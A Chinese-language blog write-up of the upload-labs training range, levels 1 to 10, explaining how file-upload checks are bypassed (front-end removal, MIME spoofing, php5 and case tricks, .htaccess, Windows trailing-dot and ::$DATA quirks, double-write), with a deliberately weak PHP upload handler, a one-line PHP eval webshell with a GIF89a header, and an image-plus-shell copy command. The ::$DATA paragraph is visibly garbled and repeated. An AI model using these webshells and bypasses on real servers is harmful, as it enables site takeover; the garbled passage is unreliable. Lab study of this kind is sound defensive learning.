文件上传漏洞-uploadlabs靶场1~10关解析

文件上传漏洞是由于服务器未对上传文件进行严格验证,允许恶意用户上传可执行脚本,从而可能控制网站或服务器。文章通过上传-labs的10个关卡分析了多种绕过前端和后端校验的方法,包括修改文件后缀、MIME类型欺骗、黑名单绕过等,并强调了前端校验的不足和需要综合防御策略的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文件上传漏洞的概念

在现代互联网的web应用程序中,上传文件是一种常见的功能,因为它有助于提高业务效率,比如社交网站中,允许用户上传图片、视频、头像和许多其他类型的文件。然而向用户提供的功能越多,web应用受到攻击的风险就越大,如果web应用存在文件上传漏洞,那么恶意用户就可以利用文件上传漏洞将可执行脚本程序上传到服务器中,获取网站的权限,或者进一步危害服务器。
为什么文件上传存在漏洞?
上传文件时,如果服务器代码未对客户端上传的文件进行严格的验证和过滤,就容易造成可以上传任意文件的情况,包括上传脚本文件(asp、aspx、php、jsp等格式的文件)。
会造成什么危害?
非法用户可以利用上传的恶意脚本文件控制整个网站,甚至控制服务器。这个恶意的脚本文件,又称之为webshell,也可将webshell脚本称为一种网页后门,webshell脚本具有强大的功能,比如查看服务器目录,服务器中的文件,执行系统命令等。

文件上传基础知识回顾

前端:

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>文件上传</title>
</head>
<body>
<form action="./upload.php" method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit">
</form>
</body>
</html>

后端代码:

<?php
header("Content-type:text/html;charset=utf-8");
echo "<pre>";
print_r($_FILES);
echo "</pre>";
// ###########################################################
// 文件到服务器之后,有一个临时存放的位置
// 后端代码: 将临时文件 转移 到我们想要存放文件的地方
// 获取文件的数据
$file = $_FILES["file"];
// 获取文件名
$fileName = $file['name'];
// 校验后缀
// xxx.png xxx.jpg xxx.jpg.png
// 通过黑白名单 限制后缀
// 白名单
// $allowExts = array(".png",".gif",".jpg");
// 黑名单
$disAllowExts = array(".php",".exe",".rar");
// 获取后缀
$ext = strchr($fileName, ".");
// 黑名单的判断方式
if (in_array($ext, $disAllowExts)){
die("文件后缀不符合要求!");
}
// 准备一个上传的路径
$basePath = "D:/PHPCODE/upload/imgs/";
// 直接上传
if (move_uploaded_file($file['tmp_name'], $basePath.$fileName)) {
echo "上传成功!";
}

文件上传漏洞原理和代码分析

这里主要借助upload-labs进行讲解。本文先介绍1~10关。

前端校验-Pass-01

image.png
可以看到这个地方限制了后缀。
查看源码:
image.png
分析页面:
image.png
记住一句话:** 前端校验,等于没有校验。**
这个时候我们只需要将这个onsubmit事件删除就可以了。
image.png
再次提交即可。
需要注意的是,有些浏览器,直接像上面那样修改之后还是会有校验的作用,怎么办呢?
可以利用burp抓响应包,然后修改响应包。
image.png
image.png
再次提交即可拿到shell。
image.png

MIME类型校验-Pass-02

image.png
这个地方的限制和Pass-01的提示不一样的,考虑后端做了验证。
查看源码:
image.png
发现对mime类型做了限制:
那么考虑抓包修改mime类型:
image.png
放包:
image.png
拿到shell:
image.png

黑名单-Pass-03

image.png
看到这种类型的提示,有可能使用了黑名单机制。
查看源码:
image.png
这个时候想要绕过的话,那么必须上传黑名单里面不存在的后缀
PHP除了.php后缀还能解析哪些后缀呢?

php3、php4、php5、phtml等,当然这个是可以修改的。

这个地方尝试利用burp抓包修改后缀为php5试试:
image.png
放包:
image.png
上传成功,拿到shell:
image.png

注意:这一关的前提是在apache配置文件中有如下配置:
AddHandler application/x-httpd-php .php .php3 .php4 .php5 .phtml
当然防御也就是将上面这句配置修改为:
AddHandler application/x-httpd-php .php

黑名单-.htaccess-Pass-04

image.png
应该是后端做了校验。
直接看源码:
image.png
也是一个典型的黑名单机制,那么就要找黑名单里面不存在的来进行绕过。
这里我们想到了.htaccess文件。

.htaccess 文件是Apache服务器中的一个配置文件,用于实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
.htaccess可以帮我们实现包括:文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表,以及使用其他文件作为index文件等一些功能。

准备一个.htaccess文件,内容为:

AddType application/x-httpd-php .png
或者
<FilesMatch "文件名">
SetHandler application/x-httpd-php
</FilesMatch>

将这个文件上传:
image.png
接下来随意写个一句话木马,然后将后缀修改为.png,上传即可。
image.png
值得说明的是,这个地方还是得需要apache打开重写规则才可以:
image.png

大小写-Pass-05

直接上传php文件:
image.png
后端肯定做了校验,和上一关的提示有点像,查看源码:
image.png
仔细看源码:
image.png
所以进行大小写绕过。
结合黑名单:

$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");

这里创建一个shell.Php进行上传。
image.png
成功拿到shell:
image.png

后缀空格-Pass-06

image.png
发现大小写已经处理了。
查看源码:
image.png
提交shell.Php然后burp抓包添加空格。
image.png
放包:
image.png
需要注意的是:
这一关只适合在Windows系统下绕过,Windows下保存文件如果后缀有空格会自动去除空格。
如果在Linux下空格会保存下来。

后缀"点"-Pass-07

利用pass-06的做法已经不行,直接看源码:
image.png
这一关还是需要利用Windows的特性,在Windows中后缀有点的情况会自动删除点。
那么我们只需要抓包在文件名后面加上 “点” 即可。
image.png
放包:
image.png
已经上传成功。
注意: 这关需要在windows下运行。

::$DATA-Pass-08

这关利用pass-07绕不过了,直接查看源码:
image.png
这个关卡还是得在Windows下面才有效。
在window的时候如果文件名+“::DATA"会把::DATA"会把::DATA"会把::DATA之后的数据当成文件流处理,不会检测后缀名,且保持::DATA之前的文件名,他的目的就是不检查后缀名。例如:"phpinfo.php::DATA之前的文件名,他的目的就是不检查后缀名。 例如:"phpinfo.php::DATA之前的文件名,他的目的就是不检查后缀名。例如:"phpinfo.php::DATA” Windows会自动去掉末尾的::DATA变成"phpinfo.php"所以知道这个特性之后,我们就可以抓包修改文件名:+::DATA变成"phpinfo.php" 所以知道这个特性之后,我们就可以抓包修改文件名:+::DATA变成"phpinfo.php"所以知道这个特性之后,我们就可以抓包修改文件名:+::DATA即可。
image.png放包:
image.png

点空格点-Pass-09

看似严谨的代码,但是在Windows系统下还是有办法处理:
image.png
经过分析我们可以构造点空格点的方式来绕过。
直接抓包:
image.png
然后放包,上传成功:
image.png
还是得在windows环境中进行。

双写-Pass-10

可以尝试各种上传,但是发现所有可能的后缀都被直接替换成空了。
查看源码:
image.png
但是我们有SQL和XSS的经验,直接双写应该就能过去
抓包尝试:
image.png
放包:
image.png
拿到shell:
image.png

### Upload-Labs简介 Upload-Labs 是一个用于学习和测试文件上传漏洞的安全实验平台。它通过模拟多种文件上传场景,帮助安全研究人员理解不同类型的文件上传攻击及其防御机制。 该实验室涵盖了常见的文件上传漏洞类型,例如 MIME 类型校验、文件扩展名校验、内容校验以及基于黑白名单的过滤策略等[^4]。 --- ### 使用方法 #### 实验环境搭建 1. **下载并部署**: 可以从公开资源获取 Upload-Labs 的源码,并将其部署至本地 PHP 环境中运行。 2. **启动服务**: 配置好 Web 服务器(如 Apache 或 Nginx),确保能够正常访问 Upload-Labs 各个页面。 #### 测试流程 - 访问各个卡页面,尝试按照提示完成指定的任务目标。 - 利用工具(如 Burp Suite 抓包分析)或者手动构造特殊文件来绕过限制条件实现上传恶意脚本的目的。 具体操作如下: 1. **准备阶段** - 创建含有木马代码的小型图片或其他允许格式文档; - 修改这些文件内部结构使其既满足表面合法性又隐藏执行指令; 2. **实施过程** - 将改造后的文件提交给目标站点; - 如果存在防护措施,则需进一步研究如何规避检测逻辑直至成功为止; 3. **验证成果** - 成功上传后可通过浏览器请求查看效果确认是否生效; --- ### 示例演示 以下是几个典型例子说明如何利用上述技术手段突破某些特定条件下设置障碍从而达成目的: #### Example 1: 绕过简单后缀名检查 假设系统仅依据文件名称最后部分决定接受与否,可以采用以下方式生成复合型图像文件: ```bash copy normal.jpg /b + shell.php /a webshell.jpg ``` 此命令会把 `normal.jpg` 和 `shell.php` 结合起来成为一个新的 JPEG 文件,在保持原有视觉表现的同时嵌入可被执行PHP语句[^2]。 #### Example 2: 处理更严格的头部标志检验情况 当遇到更加细致的规定比如要求具备标准图形开头序列(GIF89a),则应先添加相应标记再继续后续步骤: ```plaintext GIF89a<?php @eval($_POST['cmd']);?> ``` 这样即使经过初步筛查也能顺利过。 #### Example 3: 应对基于MIME类型的额外约束 对于依赖于Content-Type字段判定合法性的场合,可能需要借助代理中间件篡改传输过程中携带的相属性值以便蒙混过: ```http Content-Disposition: form-data; name="file"; filename="example.txt" Content-Type: text/plain ``` 以上就是upload labs的一些基本概念讲解及实际应用案例分享啦! ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Miracle_PHP|JAVA|安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值